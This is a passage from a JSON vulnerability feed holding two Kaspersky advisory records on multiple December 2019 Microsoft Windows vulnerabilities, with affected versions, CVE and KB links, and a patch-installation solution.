"CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1477", "CVE-2019-1476", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1489", "CVE-2019-1453", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "### *Detect date*:\n12/10/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, bypass security restrictions, gain privileges, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 \nWindows 10 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows 8.1 for x64-based systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows Server 2016 \nWindows 10 Version 1709 for x64-based Systems \nWindows RT 8.1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2019 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) 
\nMicrosoft Windows XP Service Pack 3 \nWindows 10 Version 2004 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1709 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 Version 1803 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1471>) \n[CVE-2019-1470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1470>) \n[CVE-2019-1474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1474>) \n[CVE-2019-1472](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1472>) \n[CVE-2019-1488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1488>) \n[CVE-2019-1467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1467>) \n[CVE-2019-1477](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1477>) \n[CVE-2019-1476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1476>) \n[CVE-2019-1484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1484>) \n[CVE-2019-1468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1468>) 
\n[CVE-2019-1469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1469>) \n[CVE-2019-1483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1483>) \n[CVE-2019-1458](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1458>) \n[CVE-2019-1466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1466>) \n[CVE-2019-1453](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1453>) \n[CVE-2019-1465](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1465>) \n[CVE-2019-1489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1489>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2019-1483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1483>)0.0Unknown \n[CVE-2019-1484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1484>)0.0Unknown \n[CVE-2019-1489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1489>)0.0Unknown \n[CVE-2019-1488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1488>)0.0Unknown \n[CVE-2019-1470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1470>)0.0Unknown \n[CVE-2019-1453](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1453>)0.0Unknown \n[CVE-2019-1465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1465>)0.0Unknown \n[CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>)0.0Unknown \n[CVE-2019-1474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1474>)0.0Unknown \n[CVE-2019-1472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1472>)0.0Unknown \n[CVE-2019-1476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1476>)0.0Unknown \n[CVE-2019-1471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1471>)0.0Unknown 
\n[CVE-2019-1467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1467>)0.0Unknown \n[CVE-2019-1468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1468>)0.0Unknown \n[CVE-2019-1477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1477>)0.0Unknown \n[CVE-2019-1469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1469>)0.0Unknown \n[CVE-2019-1466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1466>)0.0Unknown\n\n### *KB list*:\n[4530684](<http://support.microsoft.com/kb/4530684>) \n[4530691](<http://support.microsoft.com/kb/4530691>) \n[4530681](<http://support.microsoft.com/kb/4530681>) \n[4530714](<http://support.microsoft.com/kb/4530714>) \n[4530689](<http://support.microsoft.com/kb/4530689>) \n[4530730](<http://support.microsoft.com/kb/4530730>) \n[4530717](<http://support.microsoft.com/kb/4530717>) \n[4530698](<http://support.microsoft.com/kb/4530698>) \n[4530702](<http://support.microsoft.com/kb/4530702>) \n[4530715](<http://support.microsoft.com/kb/4530715>) \n[4565503](<http://support.microsoft.com/kb/4565503>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2019-12-10T00:00:00", "id": "KLA11868", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11868", "title": "\r KLA11868Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:59:44", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1483", "CVE-2019-1469", "CVE-2019-1471", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1477", "CVE-2019-1476", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1489", "CVE-2019-1453", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "### *Detect date*:\n12/11/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 3 \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows Server 2016 \nWindows Server, version 1803 (Server Core Installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1709 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 1909 (Server Core installation) \nWindows RT 8.1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2012 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 
Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1483>) \n[CVE-2019-1484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1484>) \n[CVE-2019-1489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1489>) \n[CVE-2019-1488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1488>) \n[CVE-2019-1453](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1453>) \n[CVE-2019-1465](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1465>) \n[CVE-2019-1458](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1458>) \n[CVE-2019-1474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1474>) \n[CVE-2019-1476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1476>) \n[CVE-2019-1471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1471>) 
\n[CVE-2019-1467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1467>) \n[CVE-2019-1468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1468>) \n[CVE-2019-1469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1469>) \n[CVE-2019-1466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1466>) \n[CVE-2019-1470](<https://nvd.nist.gov/vuln/detail/CVE-2019-1470>) \n[CVE-2019-1472](<https://nvd.nist.gov/vuln/detail/CVE-2019-1472>) \n[CVE-2019-1477](<https://nvd.nist.gov/vuln/detail/CVE-2019-1477>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2019-1483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1483>)0.0Unknown \n[CVE-2019-1484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1484>)0.0Unknown \n[CVE-2019-1489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1489>)0.0Unknown \n[CVE-2019-1488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1488>)0.0Unknown \n[CVE-2019-1470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1470>)0.0Unknown \n[CVE-2019-1453](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1453>)0.0Unknown \n[CVE-2019-1465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1465>)0.0Unknown \n[CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>)0.0Unknown \n[CVE-2019-1474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1474>)0.0Unknown \n[CVE-2019-1472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1472>)0.0Unknown \n[CVE-2019-1476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1476>)0.0Unknown \n[CVE-2019-1471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1471>)0.0Unknown \n[CVE-2019-1467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1467>)0.0Unknown 
\n[CVE-2019-1468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1468>)0.0Unknown \n[CVE-2019-1477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1477>)0.0Unknown \n[CVE-2019-1469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1469>)0.0Unknown \n[CVE-2019-1466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1466>)0.0Unknown\n\n### *KB list*:\n[4530684](<http://support.microsoft.com/kb/4530684>) \n[4530691](<http://support.microsoft.com/kb/4530691>) \n[4530681](<http://support.microsoft.com/kb/4530681>) \n[4530714](<http://support.microsoft.com/kb/4530714>) \n[4530689](<http://support.microsoft.com/kb/4530689>) \n[4530730](<http://support.microsoft.com/kb/4530730>) \n[4530717](<http://support.microsoft.com/kb/4530717>) \n[4530698](<http://support.microsoft.com/kb/4530698>) \n[4530702](<http://support.microsoft.com/kb/4530702>) \n[4530715](<http://support.microsoft.com/kb/4530715>) \n[4565503](<http://support.microsoft.com/kb/4565503>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2019-12-11T00:00:00", "id": "KLA11616", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11616", "title": "\r KLA11616Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}